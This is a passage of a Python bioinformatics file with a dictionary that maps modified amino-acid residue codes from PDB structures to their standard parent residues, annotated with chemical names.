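#   three2one['HIP'] -> 'H'   (protonation-state variants collapse to H)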
###################
# HETATM CONVERSION
# unsure about these...may include ATOM or HETATM lines...
#from http://astral.stanford.edu/scopseq-1.55/release-notes-1.55.txt
three2three = {
'AIB' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'ALA' : 'ALA' , # ALA
'ALM' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'AYA' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'BNN' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'CHG' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'CSD' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'DAL' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'DHA' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'DNP' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'FLA' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'HAC' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'PRR' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'MAA' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'TIH' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'TPQ' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'0CS':'ALA', ## 0CS ALA 3-[(S)-HYDROPEROXYSULFINYL]-L-ALANINE
'2BU':'ALA', ## 2BU ADE
    '2OP':'ALA', ## 2OP (2S)-2-HYDROXYPROPANAL
'4F3':'ALA', ## 4F3 ALA CYCLIZED
'AA4':'ALA', ## AA4 ALA 2-AMINO-5-HYDROXYPENTANOIC ACID
'ABA':'ALA', ## ABA ALA ALPHA-AMINOBUTYRIC ACID
'AHO':'ALA', ## AHO ALA N-ACETYL-N-HYDROXY-L-ORNITHINE
'AHP':'ALA', ## AHP ALA 2-AMINO-HEPTANOIC ACID
'AIB':'ALA', ## AIB ALA ALPHA-AMINOISOBUTYRIC ACID
'ALA':'ALA', ## ALA ALA
'ALC':'ALA', ## ALC ALA 2-AMINO-3-CYCLOHEXYL-PROPIONIC ACID
'ALM':'ALA', ## ALM ALA 1-METHYL-ALANINAL
'ALN':'ALA', ## ALN ALA NAPHTHALEN-2-YL-3-ALANINE
'ALS':'ALA', ## ALS ALA 2-AMINO-3-OXO-4-SULFO-BUTYRIC ACID
'ALT':'ALA', ## ALT ALA THIOALANINE
'AP7':'ALA', ## AP7 ADE
'APH':'ALA', ## APH ALA P-AMIDINOPHENYL-3-ALANINE
'AYA':'ALA', ## AYA ALA N-ACETYLALANINE
'AYG':'ALA', ## AYG ALA
'B2A':'ALA', ## B2A ALA ALANINE BORONIC ACID
'B3A':'ALA', ## B3A ALA (3S)-3-AMINOBUTANOIC ACID
'BAL':'ALA', ## BAL ALA BETA-ALANINE
'BNN':'ALA', ## BNN ALA ACETYL-P-AMIDINOPHENYLALANINE
'C12':'ALA', ## C12 ALA
'C99':'ALA', ## C99 ALA
'CAB':'ALA', ## CAB ALA 4-CARBOXY-4-AMINOBUTANAL
'CH6':'ALA', ## CH6 ALA
'CH7':'ALA', ## CH7 ALA
'CLB':'ALA', ## CLB ALA
'CLD':'ALA', ## CLD ALA
'CLV':'ALA', ## CLV ALA
'CQR':'ALA', ## CQR ALA
'CR2':'ALA', ## CR2 ALA POST-TRANSLATIONAL MODIFICATION
'CR5':'ALA', ## CR5 ALA
'CR7':'ALA', ## CR7 ALA
'CR8':'ALA', ## CR8 ALA
'CRK':'ALA', ## CRK ALA
'CRW':'ALA', ## CRW ALA
'CRX':'ALA', ## CRX ALA
'CSI':'ALA', ## CSI ALA
'CSY':'ALA', ## CSY ALA MODIFIED TYROSINE COMPLEX
'CWR':'ALA', ## CWR ALA
'DAB':'ALA', ## DAB ALA 2,4-DIAMINOBUTYRIC ACID
'DAL':'ALA', ## DAL ALA D-ALANINE
'DAM':'ALA', ## DAM ALA N-METHYL-ALPHA-BETA-DEHYDROALANINE
'DBU':'ALA', ## DBU ALA (2E)-2-AMINOBUT-2-ENOIC ACID
'DBZ':'ALA', ## DBZ ALA 3-(BENZOYLAMINO)-L-ALANINE
'DHA':'ALA', ## DHA ALA 2-AMINO-ACRYLIC ACID
'DPP':'ALA', ## DPP ALA DIAMMINOPROPANOIC ACID
'FGL':'ALA', ## FGL ALA 2-AMINOPROPANEDIOIC ACID
'DYG':'ALA', ## DYG ALA
'GMU':'ALA', ## GMU 5MU
'HHK':'ALA', ## HHK ALA (2S)-2,8-DIAMINOOCTANOIC ACID
'HMF':'ALA', ## HMF ALA 2-AMINO-4-PHENYL-BUTYRIC ACID
'IAM':'ALA', ## IAM ALA 4-[(ISOPROPYLAMINO)METHYL]PHENYLALANINE
'IGL':'ALA', ## IGL ALA ALPHA-AMINO-2-INDANACETIC ACID
'KYN':'ALA', ## KYN ALA KYNURENINE
'LAL':'ALA', ## LAL ALA N,N-DIMETHYL-L-ALANINE
'MAA':'ALA', ## MAA ALA N-METHYLALANINE
'MDO':'ALA', ## MDO ALA
'MFC':'ALA', ## MFC ALA CYCLIZED
'NAL':'ALA', ## NAL ALA BETA-(2-NAPHTHYL)-ALANINE
'NAM':'ALA', ## NAM ALA NAM NAPTHYLAMINOALANINE
'NCB':'ALA', ## NCB ALA CHEMICAL MODIFICATION
'NRQ':'ALA', ## NRQ ALA
'NYC':'ALA', ## NYC ALA
'ORN':'ALA', ## ORN ALA ORNITHINE
'PIA':'ALA', ## PIA ALA FUSION OF ALA 65, TYR 66, GLY 67
'PRR':'ALA', ## PRR ALA 3-(METHYL-PYRIDINIUM)ALANINE
'PYA':'ALA', ## PYA ALA 3-(1,10-PHENANTHROL-2-YL)-L-ALANINE
'PYC':'ALA', ## PYC ALA PYRROLE-2-CARBOXYLATE
'PYT':'ALA', ## PYT ALA MODIFIED ALANINE
'RC7':'ALA', ## RC7 ALA
'SEC':'ALA', ## SEC ALA 2-AMINO-3-SELENINO-PROPIONIC ACID
'SIC':'ALA', ## SIC ALA
'SUI':'ALA', ## SUI ALA
'TIH':'ALA', ## TIH ALA BETA(2-THIENYL)ALANINE
'TPQ':'ALA', ## TPQ ALA 2,4,5-TRIHYDROXYPHENYLALANINE
'UMA':'ALA', ## UMA ALA
'X9Q':'ALA', ## X9Q ALA
'XXY':'ALA', ## XXY ALA
'XYG':'ALA', ## XYG ALA
# 'ASX' : 'B' , # why is this here!?
'BCS' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'BUC' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'C5C' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'C6C' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CCS' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CEA' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CME' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CSO' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CSP' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CSS' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CSX' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CSW' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CY1' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CY3' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CYG' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CYM' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CYS' : 'CYS' , # CYS
'CYQ' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'DCY' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'EFC' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'OCS' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'PEC' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'PR3' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'SCH' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'SCS' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'SCY' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'SHC' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'SMC' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'SOC' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'5CS':'CYS', ## 5CS CYS
'AGT':'CYS', ## AGT CYS AGMATINE-CYSTEINE ADDUCT
'BBC':'CYS', ## BBC CYS
'BCS':'CYS', ## BCS CYS BENZYLCYSTEINE
'BCX':'CYS', ## BCX CYS BETA-3-CYSTEINE
'BPE':'CYS', ## BPE CYS
'BUC':'CYS', ## BUC CYS S,S-BUTYLTHIOCYSTEINE
'C3Y':'CYS', ## C3Y CYS MODIFIED CYSTEINE
'C5C':'CYS', ## C5C CYS S-CYCLOPENTYL THIOCYSTEINE
'C6C':'CYS', ## C6C CYS S-CYCLOHEXYL THIOCYSTEINE
'CAF':'CYS', ## CAF CYS S-DIMETHYLARSINOYL-CYSTEINE
'CAS':'CYS', ## CAS CYS S-(DIMETHYLARSENIC)CYSTEINE
'CCS':'CYS', ## CCS CYS CARBOXYMETHYLATED CYSTEINE
'CME':'CYS', ## CME CYS MODIFIED CYSTEINE
'CML':'CYS', ## CML CYS
'CMT':'CYS', ## CMT CYS O-METHYLCYSTEINE
'CS1':'CYS', ## CS1 CYS S-(2-ANILINYL-SULFANYL)-CYSTEINE
'CS3':'CYS', ## CS3 CYS
'CS4':'CYS', ## CS4 CYS
'CSA':'CYS', ## CSA CYS S-ACETONYLCYSTEIN
'CSB':'CYS', ## CSB CYS CYS BOUND TO LEAD ION
'CSD':'CYS', ## CSD CYS 3-SULFINOALANINE
'CSE':'CYS', ## CSE CYS SELENOCYSTEINE
    'CSO':'CYS', ## CSO CYS S-HYDROXYCYSTEINE
'CSR':'CYS', ## CSR CYS S-ARSONOCYSTEINE
'CSS':'CYS', ## CSS CYS 1,3-THIAZOLE-4-CARBOXYLIC ACID
'CSU':'CYS', ## CSU CYS CYSTEINE-S-SULFONIC ACID
'CSW':'CYS', ## CSW CYS CYSTEINE-S-DIOXIDE
'CSX':'CYS', ## CSX CYS OXOCYSTEINE
'CSZ':'CYS', ## CSZ CYS S-SELANYL CYSTEINE
'CY0':'CYS', ## CY0 CYS MODIFIED CYSTEINE
'CY1':'CYS', ## CY1 CYS ACETAMIDOMETHYLCYSTEINE
'CY3':'CYS', ## CY3 CYS 2-AMINO-3-MERCAPTO-PROPIONAMIDE
'CY4':'CYS', ## CY4 CYS S-BUTYRYL-CYSTEIN
'CY7':'CYS', ## CY7 CYS MODIFIED CYSTEINE
#'CYD':'CYS', ## CYD CYS
'CYF':'CYS', ## CYF CYS FLUORESCEIN LABELLED CYS380 (P14)
'CYG':'CYS', ## CYG CYS
'CYQ':'CYS', ## CYQ CYS
'CYR':'CYS', ## CYR CYS
'CYS':'CYS', ## CYS CYS
'CZ2':'CYS', ## CZ2 CYS S-(DIHYDROXYARSINO)CYSTEINE
'CZZ':'CYS', ## CZZ CYS THIARSAHYDROXY-CYSTEINE
'DCY':'CYS', ## DCY CYS D-CYSTEINE
'DYS':'CYS', ## DYS CYS
'EFC':'CYS', ## EFC CYS S,S-(2-FLUOROETHYL)THIOCYSTEINE
'FOE':'CYS', ## FOE CYS
'GT9':'CYS', ## GT9 CYS SG ALKYLATED
'GYC':'CYS', ## GYC CYS
'HTI':'CYS', ## HTI CYS
'KOR':'CYS', ## KOR CYS MODIFIED CYSTEINE
'M0H':'CYS', ## M0H CYS S-(HYDROXYMETHYL)-L-CYSTEINE
'MCS':'CYS', ## MCS CYS MALONYLCYSTEINE
'NPH':'CYS', ## NPH CYS
'NYS':'CYS', ## NYS CYS
'OCS':'CYS', ## OCS CYS CYSTEINE SULFONIC ACID
'OCY':'CYS', ## OCY CYS HYDROXYETHYLCYSTEINE
'P1L':'CYS', ## P1L CYS S-PALMITOYL CYSTEINE
'PBB':'CYS', ## PBB CYS S-(4-BROMOBENZYL)CYSTEINE
'PEC':'CYS', ## PEC CYS S,S-PENTYLTHIOCYSTEINE
    'PR3':'CYS', ## PR3 CYS DTT-CYSTEINE
'PYX':'CYS', ## PYX CYS S-[S-THIOPYRIDOXAMINYL]CYSTEINE
'R1A':'CYS', ## R1A CYS
'R1B':'CYS', ## R1B CYS
'R1F':'CYS', ## R1F CYS
'R7A':'CYS', ## R7A CYS
'RCY':'CYS', ## RCY CYS
'SAH':'CYS', ## SAH CYS S-ADENOSYL-L-HOMOCYSTEINE
'SC2':'CYS', ## SC2 CYS N-ACETYL-L-CYSTEINE
'SCH':'CYS', ## SCH CYS S-METHYL THIOCYSTEINE GROUP
'SCS':'CYS', ## SCS CYS MODIFIED CYSTEINE
'SCY':'CYS', ## SCY CYS CETYLATED CYSTEINE
'SHC':'CYS', ## SHC CYS S-HEXYLCYSTEINE
'SMC':'CYS', ## SMC CYS POST-TRANSLATIONAL MODIFICATION
'SNC':'CYS', ## SNC CYS S-NITROSO CYSTEINE
'SOC':'CYS', ## SOC CYS DIOXYSELENOCYSTEINE
'TEE':'CYS', ## TEE CYS POST-TRANSLATIONAL MODIFICATION
'TNB':'CYS', ## TNB CYS S-(2,3,6-TRINITROPHENYL)CYSTEINE
'TYX':'CYS', ## TYX CYS S-(2-ANILINO-2-OXOETHYL)-L-CYSTEINE
'YCM':'CYS', ## YCM CYS S-(2-AMINO-2-OXOETHYL)-L-CYSTEINE
'2AS' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'ASA' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'ASB' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'ASK' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'ASL' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'ASP' : 'ASP' , # ASP
'ASQ' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'BHD' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'DAS' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'DSP' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'3MD':'ASP', ## 3MD ASP 2S,3S-3-METHYLASPARTIC ACID
'A0A':'ASP', ## A0A ASP ASPARTYL-FORMYL MIXED ANHYDRIDE
'ACB':'ASP', ## ACB ASP 3-METHYL-ASPARTIC ACID
'AKL':'ASP', ## AKL ASP 3-AMINO-5-CHLORO-4-OXOPENTANOIC ACID
'ASA':'ASP', ## ASA ASP ASPARTIC ALDEHYDE
'ASB':'ASP', ## ASB ASP ASPARTIC ACID-4-CARBOXYETHYL ESTER
'ASI':'ASP', ## ASI ASP L-ISO-ASPARTATE
'ASK':'ASP', ## ASK ASP DEHYDROXYMETHYLASPARTIC ACID
'ASL':'ASP', ## ASL ASP ASPARTIC ACID-4-CARBOXYETHYL ESTER
'ASP':'ASP', ## ASP ASP
'B3D':'ASP', ## B3D ASP 3-AMINOPENTANEDIOIC ACID
'BFD':'ASP', ## BFD ASP ASPARTATE BERYLLIUM FLUORIDE
'BHD':'ASP', ## BHD ASP BETA-HYDROXYASPARTIC ACID
'DAS':'ASP', ## DAS ASP D-ASPARTIC ACID
'DMK':'ASP', ## DMK ASP DIMETHYL ASPARTIC ACID
'IAS':'ASP', ## IAS ASP ASPARTYL GROUP
'OHS':'ASP', ## OHS ASP O-(CARBOXYSULFANYL)-4-OXO-L-HOMOSERINE
'OXX':'ASP', ## OXX ASP OXALYL-ASPARTYL ANHYDRIDE
'PHD':'ASP', ## PHD ASP 2-AMINO-4-OXO-4-PHOSPHONOOXY-BUTYRIC ACID
'SNN':'ASP', ## SNN ASP POST-TRANSLATIONAL MODIFICATION
'5HP' : 'GLU' , # HETEROATOM THAT MAY BE TREATED AS GLU
'CGU' : 'GLU' , # HETEROATOM THAT MAY BE TREATED AS GLU
'DGL' : 'GLU' , # HETEROATOM THAT MAY BE TREATED AS GLU
'GGL' : 'GLU' , # HETEROATOM THAT MAY BE TREATED AS GLU
'GLU' : 'GLU' , # GLU
'GMA' : 'GLU' , # HETEROATOM THAT MAY BE TREATED AS GLU
'PCA' : 'GLU' , # HETEROATOM THAT MAY BE TREATED AS GLU
'AB7':'GLU', ## AB7 GLU ALPHA-AMINOBUTYRIC ACID
'AR4':'GLU', ## AR4 GLU
'B3E':'GLU', ## B3E GLU (3S)-3-AMINOHEXANEDIOIC ACID
'CGU':'GLU', ## CGU GLU CARBOXYLATION OF THE CG ATOM
'DGL':'GLU', ## DGL GLU D-GLU
'GLU':'GLU', ## GLU GLU
'GMA':'GLU', ## GMA GLU 1-AMIDO-GLUTAMIC ACID
'ILG':'GLU', ## ILG GLU GLU LINKED TO NEXT RESIDUE VIA CG
'LME':'GLU', ## LME GLU (3R)-3-METHYL-L-GLUTAMIC ACID
'MEG':'GLU', ## MEG GLU (2S,3R)-3-METHYL-GLUTAMIC ACID
'DAH' : 'PHE' , # HETEROATOM THAT MAY BE TREATED AS PHE
'DPN' : 'PHE' , # HETEROATOM THAT MAY BE TREATED AS PHE
'HPQ' : 'PHE' , # HETEROATOM THAT MAY BE TREATED AS PHE
'PHE' : 'PHE' , # PHE
'PHI' : 'PHE' , # HETEROATOM THAT MAY BE TREATED AS PHE
'PHL' : 'PHE' , # HETEROATOM THAT MAY BE TREATED AS PHE
'1PA':'PHE', ## 1PA PHE PHENYLMETHYLACETIC ACID ALANINE
'23F':'PHE', ## 23F PHE (2Z)-2-AMINO-3-PHENYLACRYLIC ACID
'4PH':'PHE', ## 4PH PHE 4-METHYL-L-PHENYLALANINE
'B2F':'PHE', ## B2F PHE PHENYLALANINE BORONIC ACID
'BIF':'PHE', ## BIF PHE
    'CHS':'PHE', ## CHS PHE 4-AMINO-5-CYCLOHEXYL-3-HYDROXY-PENTANOIC ACID
    'DAH':'PHE', ## DAH PHE 3,4-DIHYDROXYPHENYLALANINE
'DPH':'PHE', ## DPH PHE DEAMINO-METHYL-PHENYLALANINE
'DPN':'PHE', ## DPN PHE D-CONFIGURATION
'FCL':'PHE', ## FCL PHE 3-CHLORO-L-PHENYLALANINE
'FOG':'PHE', ## FOG PHE PHENYLALANINOYL-[1-HYDROXY]-2-PROPYLENE
'FRF':'PHE', ## FRF PHE PHE FOLLOWED BY REDUCED PHE
'HPE':'PHE', ## HPE PHE HOMOPHENYLALANINE
'HPH':'PHE', ## HPH PHE PHENYLALANINOL GROUP
'HPQ':'PHE', ## HPQ PHE HOMOPHENYLALANINYLMETHANE
'MEA':'PHE', ## MEA PHE N-METHYLPHENYLALANINE
'MTY':'PHE', ## MTY PHE 3-HYDROXYPHENYLALANINE
'NFA':'PHE', ## NFA PHE MODIFIED PHENYLALANINE
'PBF':'PHE', ## PBF PHE PARA-(BENZOYL)-PHENYLALANINE
'PCS':'PHE', ## PCS PHE PHENYLALANYLMETHYLCHLORIDE
'PF5':'PHE', ## PF5 PHE 2,3,4,5,6-PENTAFLUORO-L-PHENYLALANINE
'PFF':'PHE', ## PFF PHE 4-FLUORO-L-PHENYLALANINE
'PHA':'PHE', ## PHA PHE PHENYLALANINAL
'PHE':'PHE', ## PHE PHE
'PHI':'PHE', ## PHI PHE IODO-PHENYLALANINE
'PHL':'PHE', ## PHL PHE L-PHENYLALANINOL
'PHM':'PHE', ## PHM PHE PHENYLALANYLMETHANE
'PM3':'PHE', ## PM3 PHE
'PPN':'PHE', ## PPN PHE THE LIGAND IS A PARA-NITRO-PHENYLALANINE
'PRQ':'PHE', ## PRQ PHE PHENYLALANINE
'PSA':'PHE', ## PSA PHE
'SMF':'PHE', ## SMF PHE 4-SULFOMETHYL-L-PHENYLALANINE
'GL3' : 'GLY' , # HETEROATOM THAT MAY BE TREATED AS GLY
'GLY' : 'GLY' , # GLY
'GLZ' : 'GLY' , # HETEROATOM THAT MAY BE TREATED AS GLY
'GSC' : 'GLY' , # HETEROATOM THAT MAY BE TREATED AS GLY
'MPQ' : 'GLY' , # HETEROATOM THAT MAY BE TREATED AS GLY
'MSA' : 'GLY' , # HETEROATOM THAT MAY BE TREATED AS GLY
'NMC' : 'GLY' , # HETEROATOM THAT MAY BE TREATED AS GLY
'SAR' : 'GLY' , # HETEROATOM THAT MAY BE TREATED AS GLY
'ACY':'GLY', ## ACY GLY POST-TRANSLATIONAL MODIFICATION
'CHG':'GLY', ## CHG GLY CYCLOHEXYL GLYCINE
'CHP':'GLY', ## CHP GLY 3-CHLORO-4-HYDROXYPHENYLGLYCINE
'GHP':'GLY', ## GHP GLY 4-HYDROXYPHENYLGLYCINE
'GL3':'GLY', ## GL3 GLY POST-TRANSLATIONAL MODIFICATION
'GLY':'GLY', ## GLY GLY
'GLZ':'GLY', ## GLZ GLY AMINO-ACETALDEHYDE
'GYS':'GLY', ## GYS GLY
'IPG':'GLY', ## IPG GLY N-ISOPROPYL GLYCINE
'MEU':'GLY', ## MEU GLY O-METHYL-GLYCINE
'MPQ':'GLY', ## MPQ GLY N-METHYL-ALPHA-PHENYL-GLYCINE
'MSA':'GLY', ## MSA GLY (2-S-METHYL) SARCOSINE
'NMC':'GLY', ## NMC GLY N-CYCLOPROPYLMETHYL GLYCINE
'PG9':'GLY', ## PG9 GLY D-PHENYLGLYCINE
'SAR':'GLY', ## SAR GLY SARCOSINE
'SHP':'GLY', ## SHP GLY (4-HYDROXYMALTOSEPHENYL)GLYCINE
'TBG':'GLY', ## TBG GLY T-BUTYL GLYCINE
'3AH' : 'HIS' , # HETEROATOM THAT MAY BE TREATED AS HIS
'DHI' : 'HIS' , # HETEROATOM THAT MAY BE TREATED AS HIS
'HIC' : 'HIS' , # HETEROATOM THAT MAY BE TREATED AS HIS
'HIS' : 'HIS' , # HIS
'MHS' : 'HIS' , # HETEROATOM THAT MAY BE TREATED AS HIS
'NEM' : 'HIS' , # HETEROATOM THAT MAY BE TREATED AS HIS
'NEP' : 'HIS' , # HETEROATOM THAT MAY BE TREATED AS HIS
'HID' : 'HIS' , # single delta N protonation
'HIE' : 'HIS' , # single epsilon N protonation
'3AH':'HIS', ## 3AH HIS
'DDE':'HIS', ## DDE HIS
'DHI':'HIS', ## DHI HIS D-HISTIDINE
'HIA':'HIS', ## HIA HIS L-HISTIDINE AMIDE
'HIC':'HIS', ## HIC HIS 4-METHYL-HISTIDINE
'HIP':'HIS', ## HIP HIS ND1-PHOSPHONOHISTIDINE...or commonly used doubly protonated state
'HIQ':'HIS', ## HIQ HIS MODIFIED HISTIDINE
'HIS':'HIS', ## HIS HIS
'HSO':'HIS', ## HSO HIS HISTIDINOL
'MHS':'HIS', ## MHS HIS 1-N-METHYLHISTIDINE
'NEP':'HIS', ## NEP HIS N1-PHOSPHONOHISTIDINE
'NZH':'HIS', ## NZH HIS
'OHI':'HIS', ## OHI HIS 3-(2-OXO-2H-IMIDAZOL-4-YL)-L-ALANINE
'PSH':'HIS', ## PSH HIS 1-THIOPHOSPHONO-L-HISTIDINE
'DIL' : 'ILE' , # HETEROATOM THAT MAY BE TREATED AS ILE
'IIL' : 'ILE' , # HETEROATOM THAT MAY BE TREATED AS ILE
'ILE' : 'ILE' , # ILE
'B2I':'ILE', ## B2I ILE ISOLEUCINE BORONIC ACID
'DIL':'ILE', ## DIL ILE D-ISOLEUCINE
'IIL':'ILE', ## IIL ILE ISO-ISOLEUCINE
'ILE':'ILE', ## ILE ILE
'ILX':'ILE', ## ILX ILE 4,5-DIHYDROXYISOLEUCINE
'IML':'ILE', ## IML ILE N-METHYLATED
'ALY' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'DLY' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'KCX' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'LLP' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'LLY' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'LYM' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'LYS' : 'LYS' , # LYS
'LYZ' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'MLY' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'SHR' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'TRG' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'6CL':'LYS', ## 6CL LYS 6-CARBOXYLYSINE
'ALY':'LYS', ## ALY LYS N(6)-ACETYLLYSINE
'API':'LYS', ## API LYS 2,6-DIAMINOPIMELIC ACID
'APK':'LYS', ## APK LYS
'AZK':'LYS', ## AZK LYS (2S)-2-AMINO-6-TRIAZANYLHEXAN-1-OL
'B3K':'LYS', ## B3K LYS (3S)-3,7-DIAMINOHEPTANOIC ACID
'BLY':'LYS', ## BLY LYS LYSINE BORONIC ACID
'C1X':'LYS', ## C1X LYS MODIFIED LYSINE
'CLG':'LYS', ## CLG LYS
'CLH':'LYS', ## CLH LYS
'CYJ':'LYS', ## CYJ LYS MODIFIED LYSINE
'DLS':'LYS', ## DLS LYS DI-ACETYL-LYSINE
'DLY':'LYS', ## DLY LYS D-LYSINE
'DNL':'LYS', ## DNL LYS 6-AMINO-HEXANAL
'FHL':'LYS', ## FHL LYS MODIFIED LYSINE
'GPL':'LYS', ## GPL LYS LYSINE GUANOSINE-5'-MONOPHOSPHATE
'IT1':'LYS', ## IT1 LYS
'KCX':'LYS', ## KCX LYS CARBAMOYLATED LYSINE
'KGC':'LYS', ## KGC LYS
'KST':'LYS', ## KST LYS N~6~-(5-CARBOXY-3-THIENYL)-L-LYSINE
'LA2':'LYS', ## LA2 LYS
'LCK':'LYS', ## LCK LYS
'LCX':'LYS', ## LCX LYS CARBAMYLATED LYSINE
'LDH':'LYS', ## LDH LYS N~6~-ETHYL-L-LYSINE
    'LET':'LYS', ## LET LYS MODIFIED LYSINE
'LLP':'LYS', ## LLP LYS
'LLY':'LYS', ## LLY LYS NZ-(DICARBOXYMETHYL)LYSINE
'LSO':'LYS', ## LSO LYS MODIFIED LYSINE
'LYM':'LYS', ## LYM LYS DEOXY-METHYL-LYSINE
'LYN':'LYS', ## LYN LYS 2,6-DIAMINO-HEXANOIC ACID AMIDE
'LYP':'LYS', ## LYP LYS N~6~-METHYL-N~6~-PROPYL-L-LYSINE
'LYR':'LYS', ## LYR LYS MODIFIED LYSINE
'LYS':'LYS', ## LYS LYS
'LYX':'LYS', ## LYX LYS N''-(2-COENZYME A)-PROPANOYL-LYSINE
'LYZ':'LYS', ## LYZ LYS 5-HYDROXYLYSINE
'M2L':'LYS', ## M2L LYS
'M3L':'LYS', ## M3L LYS N-TRIMETHYLLYSINE
'MCL':'LYS', ## MCL LYS NZ-(1-CARBOXYETHYL)-LYSINE
'MLY':'LYS', ## MLY LYS METHYLATED LYSINE
'MLZ':'LYS', ## MLZ LYS N-METHYL-LYSINE
'OBS':'LYS', ## OBS LYS MODIFIED LYSINE
'SLZ':'LYS', ## SLZ LYS L-THIALYSINE
'XX1':'LYS', ## XX1 LYS N~6~-7H-PURIN-6-YL-L-LYSINE
'BUG' : 'LEU' , # HETEROATOM THAT MAY BE TREATED AS LEU
'CLE' : 'LEU' , # HETEROATOM THAT MAY BE TREATED AS LEU
'DLE' : 'LEU' , # HETEROATOM THAT MAY BE TREATED AS LEU
'LEU' : 'LEU' , # LEU
'MLE' : 'LEU' , # HETEROATOM THAT MAY BE TREATED AS LEU
'NLE' : 'LEU' , # HETEROATOM THAT MAY BE TREATED AS LEU
'NLN' : 'LEU' , # HETEROATOM THAT MAY BE TREATED AS LEU
'NLP' : 'LEU' , # HETEROATOM THAT MAY BE TREATED AS LEU
'1LU':'LEU', ## 1LU LEU 4-METHYL-PENTANOIC ACID-2-OXYL GROUP
'2ML':'LEU', ## 2ML LEU 2-METHYLLEUCINE
'BLE':'LEU', ## BLE LEU LEUCINE BORONIC ACID
'BUG':'LEU', ## BUG LEU TERT-LEUCYL AMINE
'CLE':'LEU', ## CLE LEU LEUCINE AMIDE
'DCL':'LEU', ## DCL LEU 2-AMINO-4-METHYL-PENTANYL GROUP
'DLE':'LEU', ## DLE LEU D-LEUCINE
'DNE':'LEU', ## DNE LEU D-NORLEUCINE
'DNG':'LEU', ## DNG LEU N-FORMYL-D-NORLEUCINE
'DNM':'LEU', ## DNM LEU D-N-METHYL NORLEUCINE
'FLE':'LEU', ## FLE LEU FUROYL-LEUCINE
'HLU':'LEU', ## HLU LEU BETA-HYDROXYLEUCINE
'LED':'LEU', ## LED LEU POST-TRANSLATIONAL MODIFICATION
'LEF':'LEU', ## LEF LEU 2-5-FLUOROLEUCINE
'LEU':'LEU', ## LEU LEU
'LNT':'LEU', ## LNT LEU
'MHL':'LEU', ## MHL LEU N-METHYLATED, HYDROXY
'MLE':'LEU', ## MLE LEU N-METHYLATED
'MLL':'LEU', ## MLL LEU METHYL L-LEUCINATE
'MNL':'LEU', ## MNL LEU 4,N-DIMETHYLNORLEUCINE
'NLE':'LEU', ## NLE LEU NORLEUCINE
'NLN':'LEU', ## NLN LEU NORLEUCINE AMIDE
'NLO':'LEU', ## NLO LEU O-METHYL-L-NORLEUCINE
'PLE':'LEU', ## PLE LEU LEUCINE PHOSPHINIC ACID
'PPH':'LEU', ## PPH LEU PHENYLALANINE PHOSPHINIC ACID
